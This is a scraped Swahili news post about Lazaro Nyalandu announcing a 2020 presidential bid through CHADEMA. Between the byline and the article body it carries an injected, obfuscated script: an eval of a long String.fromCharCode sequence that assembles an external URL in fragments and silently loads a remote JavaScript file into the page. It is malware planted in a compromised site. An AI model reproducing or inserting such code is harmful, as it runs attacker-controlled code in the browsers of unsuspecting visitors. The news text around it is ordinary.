Recent Comments

NYALANDU NAE ATANGAZA NIA YA KUGOMBEA URAIS KUPITIA CHADEMA.

By ObyMack David Jun 14, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

ALIYEKUWA Waziri wa Maliasili na Utalii katika Serikali ya Awamu ya Nne, @lazaronyalandu , ametangaza nia ya kuwania urais wa Jamhuri ya Muungano wa Tanzania kupitia Chama cha Demokrasia na Maendeleo (CHADEMA) alichojiunga mwaka 2017 akitokea @ccmtanzania baada ya kujiuzulu Ubunge wa Jimbo la Singida Kaskazini.

Nyalandu ametangaza nia ya kuwania nafasi hiyo wakati anazungumza na Watanzania kupitia mitandano ya kijamii ambapo alitaka vipaumbele zaidi 20 atakavyovifanyia kazi siku 100 za mwanzo akichaguliwa Rais.

Akizungumza wakati wa kutangaza nia, Nyalandu amesema leo asubuhi amemwandikia burua Katibu Mkuu wa Chama, @jjmnyika akimjulisha kusudio lake la kutia nia katika kinyang’anyiro cha kuwa mgombea #Urais2020 kupitia CHADEMA katika Uchaguzi Mkuu, Oktoba 2020. “Nasimama mbele yenu na mbele ya umma wa Watanzania, huku moyo wangu ukiwa umejaa shauku kubwa nikitamani kuiona Tanzania, nchi tuipendayo kwa moyo wote inapata ustawi na kuendeleza matamanio, matarajio na ndoto za watu wake katika kuwapatia maendeleo endevu likiwa ni Taifa linalosimamia uhuru na haki za watu, utawala wa sheria, uhuru wa vyombo vya habari na demokrasia ya kweli,” amesema Nyalandu.

Nyalandu amesema katika Awamu ya Sita chini ya uongozi wake, ataenzi misingi bora iliyojengwa na waasisi na viongozi waliotangulia, huku akiimarisha mifumo na taasisi za kuongoza nchi kupitia utawala thabiti wa sheria ambako mihimili ya Serikali, Bunge na Mahamaka zitakuwa huru na kuwepo kwa Uthibiti na Uhakiki katika kuongoza nchi, kutunga sheria, na kusimamia utoaji haki kwa wote. #siasa #uchaguzimkuu2020 #urais2020